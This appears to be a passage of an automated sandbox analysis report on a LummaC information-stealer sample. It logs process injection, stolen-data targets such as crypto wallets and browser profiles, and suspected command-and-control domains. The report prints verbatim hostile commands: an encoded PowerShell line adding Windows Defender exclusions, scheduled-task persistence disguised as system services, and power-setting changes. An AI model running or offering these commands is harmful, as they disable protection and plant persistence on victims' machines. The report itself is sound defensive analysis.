                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#mAp3eth1#> Add-MpPreference <#ZK#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uGnOjJi2C#> -Force <#mC#>
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#mAp3eth1#> Add-MpPreference <#ZK#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uGnOjJi2C#> -Force <#mC#>
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeMemory written: C:\Users\user\Desktop\PqSIlYOaIF.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                  LummaC encrypted strings found
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tamedgeesy.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: relalingj.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rottieud.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: brownieyuz.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: explainvees.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ducksringjk.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: thinkyyokej.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: repostebhu.sbs
                  Source: PqSIlYOaIF.exe, 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pragapin.sbs
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FE4008
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeProcess created: C:\Users\user\Desktop\PqSIlYOaIF.exe "C:\Users\user\Desktop\PqSIlYOaIF.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA=="
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajag0aqqbwadmazqb0aggamqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafoaswajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aecabgbpagoasgbpadiaqwajad4aiaataeyabwbyagmazqagadwaiwbtaemaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajag0aqqbwadmazqb0aggamqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafoaswajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aecabgbpagoasgbpadiaqwajad4aiaataeyabwbyagmazqagadwaiwbtaemaiwa+aa=="
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajag0aqqbwadmazqb0aggamqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafoaswajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aecabgbpagoasgbpadiaqwajad4aiaataeyabwbyagmazqagadwaiwbtaemaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajag0aqqbwadmazqb0aggamqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafoaswajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwb1aecabgbpagoasgbpadiaqwajad4aiaataeyabwbyagmazqagadwaiwbtaemaiwa+aa=="
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,9_2_00402744
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0010B7B6 cpuid 0_2_0010B7B6
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,0_2_0011814D
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,0_2_0011B9E3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,0_2_0011BA50
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,0_2_0011BB25
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,0_2_0011BB70
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0011BC17
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,0_2_00117C45
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0011B497
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,0_2_0011BD1D
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,0_2_0011B6E8
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0011B790
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,3_2_0011814D
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,3_2_0011B9E3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,3_2_0011BA50
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,3_2_0011BB25
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,3_2_0011BB70
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0011BC17
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,3_2_00117C45
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0011B497
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,3_2_0011BD1D
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: EnumSystemLocalesW,3_2_0011B6E8
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_0011B790
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,9_2_0040247D
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0010C1E5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0010C1E5
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,9_2_00405BFC
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1482625035.000000000304B000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595473812.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PqSIlYOaIF.exe PID: 7908, type: MEMORYSTR
                  Source: Yara matchFile source: 3.2.PqSIlYOaIF.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.PqSIlYOaIF.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1406718329.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Exodus\\exodus
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1406718329.000000000301E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
